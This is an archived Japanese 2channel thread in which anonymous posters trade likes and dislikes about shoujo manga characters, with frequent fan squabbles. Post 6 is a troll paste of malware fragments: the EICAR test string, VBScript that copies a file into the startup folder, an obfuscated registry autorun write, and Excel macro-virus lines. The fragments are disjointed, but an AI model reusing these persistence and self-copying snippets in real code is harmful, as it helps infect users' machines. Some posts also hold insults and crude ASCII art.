5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

好きなキャラクター、嫌いなキャラクター2

1 :花と名無しさん:2007/01/11(木) 12:57:44 ID:???0
主役,脇役,性別問わず。
好きなキャラクター,嫌いなキャラクターについて語ろう

▼前スレ
好きなキャラクター、嫌いなキャラクター
http://comic7.2ch.net/test/read.cgi/gcomic/1147874260/
▼過去スレ
好かれるキャラクター、嫌われるキャラクター
http://comic6.2ch.net/test/read.cgi/gcomic/1082393517/
好かれるヒロイン、嫌われるヒロイン
http://comic2.2ch.net/test/read.cgi/gcomic/1029423553/
好かれるヒーロー、嫌われるヒーロー
http://comic2.2ch.net/test/read.cgi/gcomic/1047566845/
○●○好きな脇役・嫌いな脇役●○●
http://comic2.2ch.net/test/read.cgi/gcomic/1042645878/

2 :花と名無しさん:2007/01/11(木) 14:19:21 ID:wkij5jSm0
2

3 :花と名無しさん:2007/01/11(木) 14:23:45 ID:???0
3げと

4 :花と名無しさん:2007/01/11(木) 17:38:19 ID:???0
4

5 :花と名無しさん:2007/01/11(木) 17:43:14 ID:???0
ID:q2ZC23UxO 死ね






6 :花と名無しさん:2007/01/11(木) 20:09:25 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2007/01/11(木) 20:12:11 ID:???0
        〜∞
      /⌒⌒ ̄ ̄ ̄\ 〜∞
    /           \ 〜〜
    |     ____ノ ノノ.__| 〜〜
    |    /U  ._)  ._) 〜〜
    |   |           ( 〜〜
    ヽ_ノ(6   ∵ ( 。。) )
     \  U     ) 3 ノ.- 、
     r―_ヽ ,,_  U  _,,ノ  々i
     ! メ   ̄`. ´  ̄`    .ノ
     .'- .ィ   >>5-6    .「 , '
.        | :。::   メ :。:: ! i
       ノ #    メ   ヽ、
     , '    ヽζζζ , '  ヽ
     .{ _.ト、   Y|iY  # ,イ .}
     '、 >.ト    '|. '   イノ .ノ
      ' .,,_ ___ ノ'人`ヽ. ___.... - '
           (;;;;;;)
          (;;;;;;;;;;;) ブリュブリュッ
          (;;;;;;;;;;;;;;;)

8 :花と名無しさん:2007/01/11(木) 20:53:13 ID:???0



   つまんねー





9 :花と名無しさん:2007/01/11(木) 21:28:26 ID:???O
スレ立て乙

イライザとか乙部のりえとか好きだった。ザコ臭ただよう悪役イイ

10 :花と名無しさん:2007/01/12(金) 13:14:47 ID:???0
美朱とかは男に惚れまくりとかも嫌でしたけど
ただ、叫んで、泣いてばかりで役立たずなとこが
1番嫌いでした。惚れまくりでも巫女としても戦いとしても
活躍できるカッコイイ一面もあればヒロインなら
嫌いにはならなかったけど・・

まあ、蜜柑も透もそこは同じですけどね。

11 :花と名無しさん:2007/01/12(金) 13:34:23 ID:???0
美朱や蜜柑に比べたら、すれ違いだが
ジャンプの女ヒロインなんてまだマシだと思う。
それ位嫌いです。

12 :花と名無しさん:2007/01/13(土) 00:49:52 ID:???0
つかたいていのジャンプの女ヒロイン大好きです
ジャンプ系はなんであんなに嫌われてんのかわからない
男×男の邪魔だからってもうすごい怖いよあの憎悪は


13 :花と名無しさん:2007/01/13(土) 01:15:21 ID:???0
このヒロインが出てる漫画はあまり詳しくは見てないけど、
よく叩かれるサクラや織姫って少なくてもここで言われてるような
好かれるはずの戦う少女なのに(織姫は戦闘に向かないらしいけど)
なんで叩かれまくってるんだ?と思ってたんだけど男×男の邪魔だったのか、なるほど。
なぞが解けたよ。ありがとう。

14 :花と名無しさん:2007/01/13(土) 07:18:39 ID:???0
>>12
板違いジャマイカ

15 :花と名無しさん:2007/01/13(土) 09:43:39 ID:???0
VBRのあげはも嫌われているよね。
読んだ事ないけど、相当バカ女らしくて・・
天然ヒロインなのかな?

16 :花と名無しさん:2007/01/14(日) 01:10:23 ID:???O
>>1

好き
オスカー(トーマの心臓)
ジョン、綾子(ゴーストハント)
千秋さん、魅録(有閑倶楽部)
大吉(うさぎドロップ)
スミレ先輩(トップオブザワールドな人たち)
百鬼夜行抄のメインキャラ

嫌い
天禁の主人公、妹、ロシエル、幼児の天使(名前忘れた)
エメラインの兄、メレディアーナ(カイン)

17 :花と名無しさん:2007/01/15(月) 18:48:32 ID:???O
NANAのノブ、ナナ、レイラは好き。
ハチ、タクミが嫌い。

18 :花と名無しさん:2007/01/15(月) 21:02:01 ID:???0
ベイビィラブのせあら好きだったな
時々うざい時もあったけど何だかんだ好きだった

あの頃のりぼんは結構いいキャラ多かったな〜と思う。
まろんとか今見るとマンセーされすぎだけど、当時はすごく好きな連載だった

19 :花と名無しさん:2007/01/15(月) 21:07:47 ID:???O
好きなのは、
K2、もな(デーモン聖典)菊音(BASARA)女宿、壁宿(ふし遊玄武)鶴見、小牧(パラパル)

嫌いなのは不幸酔いして周りに八つ当りするタイプ。フルバのリンとか。

20 :花と名無しさん:2007/01/15(月) 22:13:48 ID:???0
>>18
しゅうちゃんに何の魅力も感じずに嫌いだったことを思い出した

21 :花と名無しさん:2007/01/15(月) 23:02:05 ID:???O
しゅうちゃん繋がりで思い出した。
きんぎょ注意報のしゅうちゃんが好きだった

22 :花と名無しさん:2007/01/15(月) 23:16:05 ID:???0
きんぎょ注意報は赤ずきんチャチャと同じで好きなキャラばっかだった

23 :花と名無しさん:2007/01/16(火) 00:03:09 ID:???0
学アリの蜜柑が嫌い。


24 :花と名無しさん:2007/01/16(火) 00:19:20 ID:???0
最近のは読んでないけど喜多尚江の描くキャラは結構どの子も好きかな
空の帝国のローズとイデム、願い事は3回のリク、真夏の国の美雪と、
ファンタジアのベルと次男

25 :花と名無しさん:2007/01/16(火) 00:23:19 ID:???O
蜜柑はそれほど嫌いじゃない。
個人的には無駄に攻撃的・ヒスなキャラが嫌い。

26 :花と名無しさん:2007/01/16(火) 00:29:58 ID:???O
嫌いといえばやっぱり花男の道明寺
色ボケもワガママも周りが許すならそれでいいが犯罪はいかんよ犯罪は

27 :花と名無しさん:2007/01/16(火) 01:21:16 ID:???O
ホスト部のハルヒ嫌い。
クールなアテクシカコイイ!!な厨二病っぽい。
恋文日和の瀬々が好き。

28 :花と名無しさん:2007/01/16(火) 02:25:51 ID:???O
好き
バナナ前半のアッシュ。途中から超人化して萎えたが。
風木のセルジュ。
吉祥の小夜子。人一倍繊細なのに潔くて好き。
ハピマニのふくちゃん。友達になりたい。
まっすぐにいこうの直とたけし。

嫌い
罪ふたのカス。
星の瞳のカス。


29 :花と名無しさん:2007/01/16(火) 08:48:20 ID:???O
蜜柑とか学園アリス自体が超マイナーすぎて見た事ない。


赤ずきんチャチャは皆可愛かったなー。
当時のりぼんは好きなキャラだらけだったけど
ママレードボーイのミキは当時から嫌いだった。

30 :花と名無しさん:2007/01/16(火) 09:29:29 ID:???0
ママレのミキは好きでも嫌いでもないなあ
アリミは可愛くて好きだった

31 :花と名無しさん:2007/01/16(火) 10:25:25 ID:???O
ママレードボーイは確かにイライラした。
同時期の天ないは嫌いなキャラがいなかったが…
将と牧ちゃんのカップルは無駄に揉めすぎでイラッと。

32 :花と名無しさん:2007/01/16(火) 13:43:50 ID:???0
ママレ作者が描くヒロインって渡瀬ヒロイン並に男好きが多い気がする

33 :花と名無しさん:2007/01/16(火) 20:42:25 ID:???0
蜜柑は見ていてイライラするし生理的に嫌い。
ヒスもいやだけど、余りにも無能すぎたり
馬鹿すぎると返って萎える。

34 :花と名無しさん:2007/01/16(火) 20:51:06 ID:???0
    〜∞
      /⌒⌒ ̄ ̄ ̄\ 〜∞
    /           \ 〜〜
    |     ____ノ ノノ.__| 〜〜
    |    /U  ._)  ._) 〜〜
    |   |           ( 〜〜
    ヽ_ノ(6   ∵ ( 。。) )
     \  U     ) 3 ノ.- 、
     r―_ヽ ,,_  U  _,,ノ  々i
     ! メ   ̄`. ´  ̄`    .ノ
     .'- .ィ   >>25   .「 , '
.        | :。::   メ :。:: ! i
       ノ #    メ   ヽ、
     , '    ヽζζζ , '  ヽ
     .{ _.ト、   Y|iY  # ,イ .}
     '、 >.ト    '|. '   イノ .ノ
      ' .,,_ ___ ノ'人`ヽ. ___.... - '
           (;;;;;;)
          (;;;;;;;;;;;) ブリュブリュッ
          (;;;;;;;;;;;;;;;)




35 :花と名無しさん:2007/01/16(火) 21:35:12 ID:???0
好きなキャラを嫌いと言われたり
嫌いなキャラを好きと言われたくらいで
突っかかるのは勘弁してほしい…

36 :花と名無しさん:2007/01/16(火) 21:36:52 ID:???0
>>27
専ブラだと丸見えだから、余計な言葉は書かない方がいいと思う。
吐き捨てスレだと我慢しよう。

37 :花と名無しさん:2007/01/16(火) 21:42:16 ID:???0
イタキスをガーッと読み返した。
琴子はいつまで経っても子供っぽいし、
共感なんてしないキャラだと思ったけど
嫌悪感だとか不快感は感じなかった。
入江くんとセットで好きなキャラだと再確認。
入江くんのおかあさんも好きだ。

38 :花と名無しさん:2007/01/16(火) 21:45:22 ID:???0
           人
          ノ;;;;;;)〜〜
         (;;;;;;;;;;;;;;;)〜〜〜〜
       (;;;;;;;;;;;;;;;;;;;;;;;ヽ〜〜〜〜
      /:::::::::::::::::::::::::::::::ヽ 〜〜〜〜
     λ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;) 〜〜〜〜
    /           \ 〜〜
    |     ____ノ ノノ.__| 〜〜
    |    /U  ._)  ._) 〜〜
    |   |           ( 〜〜
    ヽ_ノ(6   ∵ ( 。。) )
     \  U     ) 3 ノ.- 、
     r―_ヽ ,,_  U  _,,ノ  々i
     ! メ   ̄`. ´  ̄`    .ノ
     .'- .ィ    >>34    「 , '
.        | :。::   メ :。:: ! i
       ノ #    メ   ヽ、
     , '    ヽζζζ , '  ヽ
     .{ _.ト、   Y|iY  # ,イ .}
     '、 >.ト    '|. '   イノ .ノ
      ' .,,_ ___ ノ'  `ヽ. ___.... - '

39 :花と名無しさん:2007/01/16(火) 21:47:00 ID:???0
幼稚な人が増えたな

40 :花と名無しさん:2007/01/16(火) 22:31:25 ID:???0
りぼんでむかーし長谷川潤が描いていた人魚の女の子。
絵とか髪型とか可愛くって好きだったなぁ…とたまーに思い出す。
※検索して作品リストを見ると「海から来た天使」って作品っぽい。違うかもしれないけど…。

ふし遊のヌリコ、チリコ。それまでどうでもいいキャラだったのに死ぬシーンにジンときた。
何度か読んでるうちに好きになってた。渡瀬悠宇は色んな作品においてキャラを殺すのが本当に上手いと思う。

嫌い
遙かの友雅。本気で気色悪い。
藤田まぐろが描くキャラ。首がやたら細くて気持ちが悪くて嫌いだった。
高屋奈月やクランプが描く天然キャラや純粋なキャラ。なんかアザとい。

41 :花と名無しさん:2007/01/16(火) 23:18:16 ID:???O
遥かの友雅が好きになれないってのに同意。
人を愛せないだの何だの大袈裟なんだよなー、中二病ぽいよ。

42 :花と名無しさん:2007/01/16(火) 23:20:05 ID:???0
>>38
蜜柑厨?キモい

43 :花と名無しさん:2007/01/16(火) 23:23:03 ID:???0
         人
          ノ;;;;;;)〜〜
         (;;;;;;;;;;;;;;;)〜〜〜〜
       (;;;;;;;;;;;;;;;;;;;;;;;ヽ〜〜〜〜
      /:::::::::::::::::::::::::::::::ヽ 〜〜〜〜
     λ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;) 〜〜〜〜
    /           \ 〜〜
    |     ____ノ ノノ.__| 〜〜
    |    /U  ._)  ._) 〜〜
    |   |           ( 〜〜
    ヽ_ノ(6   ∵ ( 。。) )
     \  U     ) 3 ノ.- 、
     r―_ヽ ,,_  U  _,,ノ  々i
     ! メ   ̄`. ´  ̄`    .ノ
     .'- .ィ    >>38    「 , '
.        | :。::   メ :。:: ! i
       ノ #    メ   ヽ、
     , '    ヽζζζ , '  ヽ
     .{ _.ト、   Y|iY  # ,イ .}
     '、 >.ト    '|. '   イノ .ノ
      ' .,,_ ___ ノ'  `ヽ. ___.... - '




44 :花と名無しさん:2007/01/16(火) 23:33:23 ID:???0
>>37
琴子は好感もてる。馬鹿だけど
応援したくなるキャラだった。あのお母さんも最高だし

45 :花と名無しさん:2007/01/17(水) 00:44:33 ID:???0
>>35
オナニー漫画ほど言い争いが耐えない。

46 :花と名無しさん:2007/01/17(水) 01:17:34 ID:???O
他人の好みにまでイチャモンつける奴はなるべくスルーの方向で。

47 :花と名無しさん:2007/01/17(水) 05:27:16 ID:???0
前スレでは不評だったけど、「ときめきトゥナイト」の蘭世が好き。その娘の愛良の方が嫌い。
一部以降と「星のゆくえ」と「ときめきミッドナイト」は見なきゃ良かった。

48 :花と名無しさん:2007/01/17(水) 07:09:06 ID:???0
ここで嫌われが多い蜜柑は自分も嫌いだ。笑うしか脳のない
役立たず系統は基本的に嫌いだし。

49 :花と名無しさん:2007/01/17(水) 12:32:38 ID:???0
嫌い レイプした男に惚れちゃう性コミヒロイン

50 :花と名無しさん:2007/01/17(水) 14:49:23 ID:???O
弱さや不幸を武器にして泣き落としするキャラは嫌いだな。

好きなのは、劣化する前の川原教授漫画の女の子達。
のほほんしつつ適度に毒舌・したたかで聖女じゃないとこがいい。

51 :花と名無しさん:2007/01/17(水) 15:33:56 ID:???0
>のほほんしつつ適度に毒舌・したたか

なかよしに掲載されていた野村あきこのプライベートアイズの碧さんを思い出した
この漫画のヒロインの里花は泣き虫で微妙に鬱陶しい系だけど好きだったなー

52 :花と名無しさん:2007/01/17(水) 15:36:34 ID:???O
フルバの不幸中毒メンバーが大嫌いだった、特にアキトとかリンとか夾とか。
花より〜の道明寺もか。
攻撃的なバカが一番タチ悪いと思う。

53 :花と名無しさん:2007/01/17(水) 15:46:42 ID:???0
フルバはキャラの不幸話ばかりでついていけなくなった。
多種多様なクソ親ばかり出てきて辛くなったよ。

好きなのは小さな恋のものがたりや赤ずきんチャチャのキャラたち

54 :花と名無しさん:2007/01/17(水) 16:02:14 ID:???0
好き
仙堂桃花(聖・ドラゴンガール)
強くて、ちょっぴりコケティッシュで、しかも一途で正義感が強い
と理想のヒロイン像でみてて気持ちよかった。

55 :花と名無しさん:2007/01/17(水) 16:23:21 ID:???0
嫌い
仙堂杏樹(聖・ドラゴンガールみらくる)
うじうじくだらないことで悩むわ、蓮と隆司のどっちが好きか
最後の最後まで煮え切らないわと見ていてストレスが溜まった。
なまじ桃花が好きだったせいで、なおさら怒りが蓄積したのかもしんない。

56 :花と名無しさん:2007/01/17(水) 19:17:44 ID:???0
>284 :名無しかわいいよ名無し :2007/01/14(日) 22:14:32 >ID:NsQOC4DC
>佐倉蜜柑みたいな口だけのお荷物は
>ホント嫌。おまけにコイツの信者となつみかん信者は
>ファンサイト荒らしだの潰しだの
>2ちゃんにアドレス貼って晒し者にしたり
>アダルトサイト貼って卑猥な書き込みいしたり
>最低最悪。バカの信者はやはりバカだと思った。


これってマジ?



57 :花と名無しさん:2007/01/17(水) 19:18:53 ID:???0
キャラ板の書き込み?そっちで聞けば??

58 :花と名無しさん:2007/01/17(水) 19:40:58 ID:???0
ソースも何も無い報告書き込みを信用しちゃいかん

59 :花と名無しさん:2007/01/17(水) 19:45:40 ID:???O
>ファンサイト荒らしだの潰しだの
>2ちゃんにアドレス貼って晒し者にしたり
>アダルトサイト貼って卑猥な書き込みいしたり


本当かガセかどうか知らないけど
蜜柑って信者もアンチも痛いの多いね。

60 :花と名無しさん:2007/01/17(水) 20:01:11 ID:???O
>>53
多種多用?
子に対する当たり方の描写はバカの一つ覚えみたくワンパターンだった気が。
どこを向いても似非メンヘラ似非メンヘラ…
そういう人間洞察の浅いやつがDQN描くなと言いたい。
胸糞悪さに拍車がかかるから


61 :花と名無しさん:2007/01/17(水) 20:12:24 ID:???O
>>59
真偽はともかく、蜜柑叩きに目の色変えてるようで引くな
別個にアンチスレ作ればいいのに

62 :花と名無しさん:2007/01/17(水) 20:12:26 ID:???O
>>56
嘘くっせぇwwww





とか書いたら蜜柑アンチが「嘘じゃないよホラ!!」って
問題のサイト張り付けたりして更にカオスになるんだろうな…

63 :花と名無しさん:2007/01/17(水) 20:25:42 ID:???O
フルバの夾も単独アンチスレあるんだし立てればいいのにね。
吐き出しスレとは言ってもここまで来るとさすがに迷惑…

「ライバルはキュートボーイ」に出てくる野花が嫌い。
自分に自信が無いのは分かるけど卑屈で他人に当たり散らす
ヒス女にしか見えなかった。

64 :花と名無しさん:2007/01/18(木) 03:38:12 ID:???0
>>56
このスレにいるアンチ蜜柑の文面によう似てるな

65 :花と名無しさん:2007/01/18(木) 05:55:18 ID:???0
嫌い 異質なアンチを抱えてるキャラ

毎回同じようなレスでうんざり&しつこい
それを少しでも迷惑がったり、否定的になれば信者認定する
本物の信者が釣れたらスレは悲惨な状態に陥る

66 :花と名無しさん:2007/01/18(木) 06:28:09 ID:???0
新條まゆが描くキャラはネタキャラとして見れば好きになれる

67 :花と名無しさん:2007/01/18(木) 08:02:45 ID:???0
道明寺って何であんな人気あるんだろうね

68 :花と名無しさん:2007/01/18(木) 08:26:44 ID:???0
あいつ人気あったっけ?
ジャニ効果?

69 :花と名無しさん:2007/01/18(木) 08:40:40 ID:???O
蜜柑とか地味すぎて話題についていけないんだけど
キモイ事だけは分かったから読まないようにするよ。
読む機会もないがw



フルバの透とか魅力もないし言う事も胡散臭いマンセーヒロインは自分も嫌いだが
ホストのハルヒとかは言葉に取り繕うような優しさがないから嫌いではない。
あと少女漫画に入るか分からんがARIAのキャラは全員好きだ。可愛い。

70 :花と名無しさん:2007/01/18(木) 08:47:03 ID:u6cdGNpb0
>>69
わたしもARIAキャラ全員好きです。
みんなそれぞれ可愛いし、騒々しくないし、害を感じない。
同じく少女漫画に入るかどうか分からないと
思っていたので今までガマンしてたけど…。

71 :花と名無しさん:2007/01/18(木) 11:18:40 ID:???0
>>56
わざわざここに持ってくるあんたが
1番痛いよ。ウザイ出てけ
お前みたいなのがいるから
変なのが増えるんだよ。キモい漫画ほどそういうのが
いるんだね、言いがかりつけたりしてさ〜






72 :花と名無しさん:2007/01/18(木) 11:26:44 ID:???0
どうも墓穴掘ったっぽいね

73 :花と名無しさん:2007/01/18(木) 11:37:52 ID:???0
こういう話題はすぐに噛み付くね。
まあ痛いのは分かったよ。信者は叩かれて腹立つし
アンチは抗議されて腹立つし、よくやると思うね

74 :花と名無しさん:2007/01/18(木) 11:45:06 ID:???0
花ゆめオタは、本当に痛いの多すぎ。

75 :花と名無しさん:2007/01/18(木) 11:45:58 ID:???0
墓穴って言うか逆効果
信者にとってもアンチにとっても

76 :花と名無しさん:2007/01/18(木) 11:47:35 ID:???0
いいんじゃないの?もう既に前から墓穴掘っているし。
今更って感じだけど。

77 :花と名無しさん:2007/01/18(木) 11:51:30 ID:???0
学アリだったら、蜜柑より棗の方が嫌いだけどなw
大人気取りのマセガキで可愛げないし。態度がワザとらしいし。

78 :花と名無しさん:2007/01/18(木) 11:54:57 ID:???0
ふし遊の唯とフルバのリンが嫌い

79 :花と名無しさん:2007/01/18(木) 12:05:47 ID:???0
フルバのリン自分も嫌い。なにあのDQNぶり?
楽羅が透ぶった時、リンが楽羅につっかかるのが退いた。

80 :花と名無しさん:2007/01/18(木) 12:07:46 ID:???0
http://comic7.2ch.net/test/read.cgi/cchara/1165581767/284

ID検索で掘れた。これだな
ここの284に尋ねるよろし>>56

81 :花と名無しさん:2007/01/18(木) 12:14:18 ID:???0
わざわざ・・調べてくるんだ・・ご苦労な事で・・

82 :花と名無しさん:2007/01/18(木) 12:19:43 ID:???0
蜜柑アンチも信者も、いていいじゃん〜
何がそう気に入らないんだろう?漫画には好きなキャラもいれば
嫌いなのもいるんだから、いちいち目くじら立てても仕方ないのに・・

83 :花と名無しさん:2007/01/18(木) 12:25:16 ID:???0
そもそも蜜柑信者なんていない。
夾アンチと同じような理由で煙たがられてるような…

84 :花と名無しさん:2007/01/18(木) 12:29:04 ID:???0
ようするに>>35

85 :花と名無しさん:2007/01/18(木) 12:29:33 ID:???0
いないかどうかなんてはっきりとは、わかんないだろ?
そんなの?蜜柑を叩かれて抗議する輩もいるし・・
決め付けるのはおかしい。

86 :花と名無しさん:2007/01/18(木) 12:30:45 ID:???0
いるんじゃないの?信者くらい・・


87 :花と名無しさん:2007/01/18(木) 12:32:04 ID:???0
>>65
禿同

88 :花と名無しさん:2007/01/18(木) 12:33:05 ID:???0
まあ、他のスレでは織姫やリナリー並にアンチがいそうなのは
確かだけど。

89 :花と名無しさん:2007/01/18(木) 12:34:58 ID:???0
前スレで蜜柑を好きなキャラに挙げてる人いないじゃん
「ガキだからあの性格は仕方ない」「別に嫌いじゃない」「学アリとかマイナーすぎて知らん」とかばかり
そう言われたくらいで「信者乙」といきり立つからそれは違うだろみたいな反論になるんでしょう…

90 :花と名無しさん:2007/01/18(木) 12:35:44 ID:???0
顔真っ赤になってますよ、落ち着け

91 :花と名無しさん:2007/01/18(木) 12:36:25 ID:???0
そう言うこと書くから信者とか言われるんだろ?
スルーしようよ。>>89


92 :花と名無しさん:2007/01/18(木) 12:36:51 ID:???0
学アリは信者もアンチも痛いってことでいいじゃん

93 :花と名無しさん:2007/01/18(木) 12:41:03 ID:???0
フルバキャラ殆ど
初期の透や設定や展開に
物珍しい印象を持って読み始めたけど
だんだん萎えてきて16巻で挫折したorz
なんであんなに陰湿なキャラばかりなんだよ('A`)

94 :花と名無しさん:2007/01/18(木) 12:42:10 ID:???O
学アリに限らず、叩かれキャラを少しでも擁護すると
たちまち信者扱いする奴が一番ウザイ。
吐き出しスレだからって他人に突っ掛かるのはアンチ・信者共にやめて。

95 :花と名無しさん:2007/01/18(木) 12:58:58 ID:???0
ふし遊の美朱のファンとアンチは素晴らしいな
美朱に好意的だろうと否定的だろうと基本的に争わないから

96 :花と名無しさん:2007/01/18(木) 13:05:46 ID:???0
小花美穂が描くキャラって好きなのが多い
パートナーの苗は、自分の置かれてる立場に嘆いたり
思わず泣いたりもしてたけど、ちゃんと解決できるように
自分で行動に出たりして、精神的に強い感じで好きだった

97 :花と名無しさん:2007/01/18(木) 13:06:05 ID:???0
>>95
「身赤は痛い」という見解は一致してるからかね?

どのキャラにせよ自分が絶対正しい!とばかりに
反対意見に食いついたりバカにする奴、見ててアホっぽいな。

98 :花と名無しさん:2007/01/18(木) 13:09:53 ID:???0
弱くてもいいから、時間がかかっても頑張るタイプがいいよね。
コンプ持って勝手に病んで迷惑かけるキャラは苦手。
なのでBASARAの浅葱とか苦手だった。最後はカッコよかったけど。

99 :花と名無しさん:2007/01/18(木) 13:17:05 ID:???0
>>98
>弱くてもいいから、時間がかかっても頑張るタイプ

そういうキャラの方が共感というか共鳴というか…好感?を持てるね。

100 :花と名無しさん:2007/01/18(木) 13:20:09 ID:???0
あさりちゃんの家族が嫌いです

101 :花と名無しさん:2007/01/18(木) 13:22:12 ID:???0
最初から何でも持ってる才色兼備のくせしてねじくれてる奴とか
そのねじれに余程の理由がない限り鬱陶しいとしか思わないからねえ。

102 :花と名無しさん:2007/01/18(木) 13:28:12 ID:???0
ガラスの仮面の亜弓さんは最近好きになってきた

103 :花と名無しさん:2007/01/18(木) 13:30:04 ID:???0
自分も亜弓さん好きw
マヤに恋してるんじゃなかろうかと疑うほどの熱さ、一番漢!って感じ。

104 :花と名無しさん:2007/01/18(木) 13:43:25 ID:BsXy1gwC0
ここは嫌いなキャラを吐き捨てるスレなのに
信者がアンチウザイとか書いてるのにワロタ
それがまた痛いと評判のキャラの信者みたいだし

つくづく最悪だな

105 :花と名無しさん:2007/01/18(木) 13:44:22 ID:???0
百鬼夜行抄の主人公
ひょうひょうとした面倒くさがりなとこが好き

106 :花と名無しさん:2007/01/18(木) 13:47:58 ID:???0
オスカルは好きなんだけど
ウテナ、ハルヒ、瑞希、風光るの主人公が嫌いだorz

107 :花と名無しさん:2007/01/18(木) 13:50:38 ID:???0
>>104
アンチと信者の叩き合いにはみんなウンザリしてんだから空気嫁

108 :花と名無しさん:2007/01/18(木) 13:52:39 ID:???0
>>106
自分もその主人公達は嫌いだ…。
ハルヒは自分から進んでやってるって訳じゃないからそれほどでもないが
不覚悟な中途半端男装ヒロインって見ていてイライラする。

109 :花と名無しさん:2007/01/18(木) 13:55:37 ID:???0
一昔前のキャラって結構好かれてるな

110 :花と名無しさん:2007/01/18(木) 13:59:30 ID:???0
ひかわ漫画のほのぼのカップルが好きです。
一昔ってほどでもないがBASARAの市松×菊音にも萌えた。
現在連載中ではデーモン聖典のK2×もなが好き。

111 :花と名無しさん:2007/01/18(木) 14:01:19 ID:???0
>>107
まあいいんじゃない?
十分痛いって事が判ったから、もう下手にキャラの
萌え語りが出来ないだろうし。

>>106
ウテナは好きだけど、ハルヒはあんま好きじゃないな。

112 :花と名無しさん:2007/01/18(木) 14:04:57 ID:???0
だいぶ前にぱふで彼方からが特集されてて
2ちゃんでもたびたび面白いとかキャラが良いって言われてて
興味は持ってるんだけど、絵が…ゴニョゴニョ
前スレでも結構ノリコ好きって言う人がいたので
イタキスの時みたいに思い切って飛び込んでみようかなぁ

113 :花と名無しさん:2007/01/18(木) 14:06:05 ID:???0
確かに、ノリコって好かれているよね。
他の主人公は散々なのに・・みあかとか・・
何が違うんだろう・・

114 :花と名無しさん:2007/01/18(木) 14:07:27 ID:???0
作者の技量

115 :花と名無しさん:2007/01/18(木) 14:09:16 ID:???0
僕等がいたの七美、山芋。
どっちも違った意味で嫌い。

116 :花と名無しさん:2007/01/18(木) 14:13:31 ID:???0
叩かれ覚悟で言うとイタキスの琴子が苦手
悪い子じゃないって分かってるんだけど何となく微妙

117 :花と名無しさん:2007/01/18(木) 15:34:37 ID:???0
少数派だろうが、彼方からのイザークがあまり好きではない。
女がいないとすぐダメになる系(この場合仕方ない面もあるが)って嫌だ。

118 :花と名無しさん:2007/01/18(木) 15:39:40 ID:???0
アンジェリク(アンジェリク・木原敏江)はなかなか好き

119 :花と名無しさん:2007/01/18(木) 15:59:31 ID:???0
これも少数派だけど緋桜白拍子の梓と時迅が好きだったな。
梓の可愛さと白拍子姿はいいと思えた。

120 :花と名無しさん:2007/01/18(木) 16:46:16 ID:6EITlblZO
ハチクロのはぐ
美朱なんか足元にも及ばない嫌な女っぷり

121 :花と名無しさん:2007/01/18(木) 17:01:06 ID:???0
>>113
ノリコは他人に頼るばかりじゃなく、自分も強くなって相手を守ろうと
努力しているからかな。

美朱は男に寄りかかって守ってもらう事しか考えていないよ。

122 :花と名無しさん:2007/01/18(木) 17:17:04 ID:???O
蜜柑なんて信者うざいと言われるほど人気も知名度もないんだから
アンチもほっとけばいいのに…。
正直蜜柑嫌いな人が多いのは分かったけど
少なくとも学アリなんて、ふしぎ遊戯や花男、フルバと違って
こんなに何回も名前が上がるほど知ってる人いないだろ。
明らかにアンチ(学園アリスの他キャラ信者?)の自演臭でうざいよ。
学園アリスそのもの

123 :花と名無しさん:2007/01/18(木) 18:00:30 ID:???0
学園アリスはアニメでちょと見てたけど
いつもの騒がしいだけの学園萌え系使い捨てアニメって印象しか残ってないや(´・ω・`)
ただパクロミのやってたクソガキはウザかったな

124 :花と名無しさん:2007/01/18(木) 18:01:05 ID:???0
性コミでよく見かける避妊もしないで中出しセックル
やりまくっていざ妊娠疑惑が浮上したら
「産んでくれ。愛しいお前の子供が欲しい」とか言う男と
それに涙流して喜ぶ女は無条件に嫌い。

>>56
ファンサイトって何?
信者なのにファンサイト荒らすの?

125 :花と名無しさん:2007/01/18(木) 18:05:48 ID:???0
>>124
>>80

126 :花と名無しさん:2007/01/18(木) 18:11:11 ID:???0
http://tiyu.to/title.html#18_02_14
http://ma-ru.sakura.ne.jp/kutuzyoku.html
http://ma-ru.sakura.ne.jp/mayutan.html
http://ma-ru.sakura.ne.jp/gosyuzinsama.html
http://ma-ru.sakura.ne.jp/megaren.html


性コミ系は作者がイカれてる

127 :花と名無しさん:2007/01/18(木) 18:15:39 ID:???0
>>124
夢小説サイトの事じゃないの?
花ゆめって虹禁止のはずなのに虹サイトわんさかあるから。


ジョージ朝倉作品のキャラは全体的に好きだけど
「ハートを打ちのめせ!」の荒井根岸カップルが特に好き。
あとママレの茗子も好き。

128 :花と名無しさん:2007/01/18(木) 18:35:29 ID:???0
嫌いなキャラのタイプを上げたら一々「そうそう○○なんて
まさにそう!!ウザイし馬鹿だし(以下語り」
って便乗してくる狂アンチが付いてる某キャラが嫌いです。

それを狙ってたんなら大成功ですね。

129 :花と名無しさん:2007/01/18(木) 19:01:23 ID:???0
蜜柑は総叩き状態だけど棗はあまり叩かれないんだね。
私棗嫌い。蜜柑どうでもいい。

蜜柑アンチに叩かれそうで怖いけど。

130 :花と名無しさん:2007/01/18(木) 19:03:04 ID:???O
アホな信者も狂犬のようなアンチもイラネ
漫画の足を引っ張ってるよな

131 :花と名無しさん:2007/01/18(木) 19:15:30 ID:???0
